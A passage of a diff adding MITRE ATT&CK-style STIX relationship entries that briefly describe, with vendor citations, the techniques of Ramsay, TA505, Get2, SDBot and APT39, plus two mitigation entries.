+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can use the Windows COM API to schedule tasks and maintain persistence as well as the WriteFile, CloseHandle, and GetCurrentHwProfile functions during collection.(Citation: Eset Ramsay May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--239eb918-b9e0-499c-9934-96382fa782a0",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.753Z",
+ "created": "2020-05-28T16:38:03.762Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has base64-encoded its portable executable and hidden itself under a JPG header. [Ramsay](https://attack.mitre.org/software/S0458) can also embed information within document footers.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--e273286f-8ca7-4d3e-bdc3-08929c7cbd12",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.743Z",
+ "created": "2020-05-28T16:38:03.764Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can schedule tasks via the Windows COM API to maintain persistence.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--417912a3-95a8-4dd4-a586-88cca62f3ebc",
+ "type": "relationship",
+ "modified": "2020-06-12T16:15:05.094Z",
+ "created": "2020-05-28T16:38:03.767Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has been delivered using OLE objects in malicious documents.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--0709589f-cc25-4925-89be-59e121c47951",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.261Z",
+ "created": "2020-05-28T16:38:03.769Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can insert itself into the address space of other applications using the AppInit DLL Registry key.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f96794d1-0707-4897-9de1-08546b605bf0",
+ "type": "relationship",
+ "modified": "2020-06-15T20:53:11.720Z",
+ "created": "2020-05-28T16:38:03.771Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has included a rootkit to evade defenses.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--2962304a-f96e-4323-958f-f685eae97ac6",
+ "type": "relationship",
+ "modified": "2020-05-28T16:38:03.774Z",
+ "created": "2020-05-28T16:38:03.774Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has been embedded in documents exploiting CVE-2017-0199 and CVE-2017-11882.(Citation: Eset Ramsay May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--76a3097b-808d-45a9-aa81-dce5ed6a45d3",
+ "type": "relationship",
+ "modified": "2020-05-28T16:38:03.775Z",
+ "created": "2020-05-28T16:38:03.775Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) can spread itself by infecting other portable executable files on networks shared drives.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--365f82e7-6fad-44a7-855d-955d4307920f",
+ "type": "relationship",
+ "modified": "2020-06-08T19:12:14.263Z",
+ "created": "2020-05-28T16:38:03.777Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--ba09b86c-1c40-4ff1-bda0-0d8c4ca35997",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "Eset Ramsay May 2020",
+ "url": "https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/",
+ "description": "Sanmillan, I.. (2020, May 13). Ramsay: A cyber\u2011espionage toolkit tailored for air\u2011gapped networks. Retrieved May 27, 2020."
+ }
+ ],
+ "description": "[Ramsay](https://attack.mitre.org/software/S0458) has masqueraded as a 7zip installer.(Citation: Eset Ramsay May 2020)\t",
+ "relationship_type": "uses",
+ "id": "relationship--882002ca-25a6-4226-9cc4-3efe5f798449",
+ "type": "relationship",
+ "modified": "2020-06-12T16:15:05.155Z",
+ "created": "2020-05-28T16:38:03.779Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used a tool named mfevtpse.exe to proxy C2 communications, closely mimicking a legitimate McAfee file mfevtps.exe.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d7a244fa-f52c-4e54-9088-6f9ccda8b2b9",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.170Z",
+ "created": "2020-05-29T14:02:52.170Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--e3388c78-2a8d-47c2-8422-c1398b324462",
+ "target_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530",
+ "external_references": [
+ {
+ "source_name": "Microsoft Protected Users Security Group",
+ "url": "https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group",
+ "description": "Microsoft. (2016, October 12). Protected Users Security Group. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "Consider adding users to the \"Protected Users\" Active Directory security group. This can help limit the caching of users' plaintext credentials.(Citation: Microsoft Protected Users Security Group)",
+ "relationship_type": "mitigates",
+ "id": "relationship--6c1da818-6e35-4fa8-ad40-e45c2c90e016",
+ "type": "relationship",
+ "modified": "2020-05-29T16:34:40.452Z",
+ "created": "2020-05-29T16:34:40.452Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has executed commands using cmd.exe.(Citation: Trend Micro TA505 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fee6aca0-dcb7-43b4-a253-66913620631a",
+ "type": "relationship",
+ "modified": "2020-06-15T22:05:43.295Z",
+ "created": "2020-05-29T19:02:06.766Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "tool--03342581-f790-4f03-ba41-e82e67392e23",
+ "external_references": [
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "(Citation: Trend Micro TA505 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c5be8127-669e-49b9-b603-581e3498d203",
+ "type": "relationship",
+ "modified": "2020-05-29T19:02:07.052Z",
+ "created": "2020-05-29T19:02:07.052Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--aae22730-e571-4d17-b037-65f2a3e26213",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[ServHelper](https://attack.mitre.org/software/S0382) has the ability to execute a PowerShell script to get information from the infected host.(Citation: Trend Micro TA505 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8982affe-fe2b-40c8-8b0c-e539687f4124",
+ "type": "relationship",
+ "modified": "2020-05-29T19:31:03.872Z",
+ "created": "2020-05-29T19:31:03.872Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--29ba5a15-3b7b-4732-b817-65ea8f6468e6",
+ "external_references": [
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used fast flux to mask botnets by distributing payloads across multiple IPs.(Citation: Trend Micro TA505 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--53356453-2cf1-46d9-ac8f-77fc3a2274d9",
+ "type": "relationship",
+ "modified": "2020-06-17T19:18:13.843Z",
+ "created": "2020-05-29T20:09:48.844Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
+ "target_ref": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470",
+ "external_references": [
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used the tool EmailStealer to steal and send lists of e-mail addresses to a remote server.(Citation: Trend Micro TA505 June 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--02c88228-8275-42a7-9c3a-d5393556bceb",
+ "type": "relationship",
+ "modified": "2020-06-16T16:57:13.566Z",
+ "created": "2020-05-29T20:09:48.869Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "target_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Get2](https://attack.mitre.org/software/S0460) has the ability to inject DLLs into processes.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5a0db1e3-cd18-4f00-936b-4b8ede1e0498",
+ "type": "relationship",
+ "modified": "2020-06-15T22:52:32.039Z",
+ "created": "2020-05-29T20:32:42.892Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Get2](https://attack.mitre.org/software/S0460) has the ability to run executables with command-line arguments.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c14e629a-c0cd-4600-873b-924d04d8b627",
+ "type": "relationship",
+ "modified": "2020-06-15T22:52:32.032Z",
+ "created": "2020-05-29T20:32:42.897Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Get2](https://attack.mitre.org/software/S0460) has the ability to identify running processes on an infected host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6118a138-c13c-4117-97dd-c3e7ec3e1021",
+ "type": "relationship",
+ "modified": "2020-05-29T20:32:42.907Z",
+ "created": "2020-05-29T20:32:42.907Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the computer name and Windows version of an infected host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9c4281ea-b225-44b4-b460-255e51586598",
+ "type": "relationship",
+ "modified": "2020-06-15T22:52:32.034Z",
+ "created": "2020-05-29T20:32:42.930Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Get2](https://attack.mitre.org/software/S0460) has the ability to use HTTP to send information collected from an infected host to C2.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--db9384b2-ea34-4dd9-8554-e01b1606e7ce",
+ "type": "relationship",
+ "modified": "2020-05-29T20:32:42.954Z",
+ "created": "2020-05-29T20:32:42.954Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--099ecff2-41b8-436d-843c-038a9aa9aa69",
+ "target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[Get2](https://attack.mitre.org/software/S0460) has the ability to identify the current username of an infected host.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d56e3076-7221-4e3b-8628-d8c50982892d",
+ "type": "relationship",
+ "modified": "2020-06-15T22:52:32.036Z",
+ "created": "2020-05-29T20:32:42.951Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to use image file execution options for persistence if it detects it is running with admin privileges on a Windows version newer than Windows 7.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--91e86813-270d-4ee6-8dff-9b87e3d9fae4",
+ "type": "relationship",
+ "modified": "2020-06-01T13:14:42.514Z",
+ "created": "2020-06-01T13:14:42.514Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to add a value to the Registry Run key to establish persistence if it detects it is running with regular user privilege. (Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--7333e2da-7aa5-4559-a03d-5818883d62d5",
+ "type": "relationship",
+ "modified": "2020-06-01T16:11:40.359Z",
+ "created": "2020-06-01T13:14:42.529Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to XOR the strings for its installer component with a hardcoded 128 byte key.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--f252d0e6-019a-4711-9069-c16930236aa4",
+ "type": "relationship",
+ "modified": "2020-06-01T13:14:42.536Z",
+ "created": "2020-06-01T13:14:42.536Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "target_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83",
+ "external_references": [
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ }
+ ],
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) has the ability to use application shimming for persistence if it detects it is running as admin on Windows XP or 7, by creating a shim database to patch services.exe.(Citation: Proofpoint TA505 October 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1e29cbcc-3e45-4e62-a66f-4479b310ccdb",
+ "type": "relationship",
+ "modified": "2020-06-01T13:14:42.559Z",
+ "created": "2020-06-01T13:14:42.559Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "course-of-action--20f6a9df-37c4-4e20-9e47-025983b1b39d",
+ "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "external_references": [
+ {
+ "source_name": "Microsoft Preventing SMB",
+ "url": "https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections",
+ "description": "Microsoft. (2020, March 10). Preventing SMB traffic from lateral connections and entering or leaving the network. Retrieved June 1, 2020."
+ }
+ ],
+ "description": "Consider using the host firewall to restrict file sharing communications such as SMB. (Citation: Microsoft Preventing SMB)",
+ "relationship_type": "mitigates",
+ "id": "relationship--bf3b7eae-a651-4a2b-9308-52fe2542766e",
+ "type": "relationship",
+ "modified": "2020-06-09T20:56:10.116Z",
+ "created": "2020-06-01T13:16:32.923Z"
